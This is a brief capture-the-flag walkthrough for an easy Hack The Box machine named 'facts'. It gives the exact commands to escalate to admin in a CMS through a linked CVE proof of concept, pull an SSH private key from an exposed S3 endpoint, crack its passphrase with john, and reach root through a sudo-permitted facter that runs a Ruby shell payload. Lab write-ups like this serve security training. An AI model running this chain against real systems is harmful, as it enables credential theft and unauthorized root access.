htb machine - facts (easy)

user flag

/admin endpoint shows a cameleon CMS instance. create account and use following CVE to escalate to admin:

https://github.com/d3vn0mi/cve-2025-2304-poc

on the page http://facts.htb/admin/settings/site, on the Filesystem Settings

aws s3 ls s3:// --endpoint-url http://facts.htb:54321 --recursive

aws s3 cp s3://internal/.ssh/id_ed25519 . --endpoint-url http://facts.htb:54321

ssh2john id_ed25519 > hash.txt

john hash.txt --wordlist=~/wordlists/rockyou.txt -> password dragonballz

chmod 600 id_ed25519

ssh -i id_ed25519 trivia@facts.htb

enter passphrase dragonballz

and obtain user flag on the william home directory.

root flag

trivia@facts:/tmp$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

facter allows for executing ruby scripts.

create a simple a.rb file with the contents exec "/bin/sh"

sudo facter --custom-dir .

from there, it is gg and cat the root flag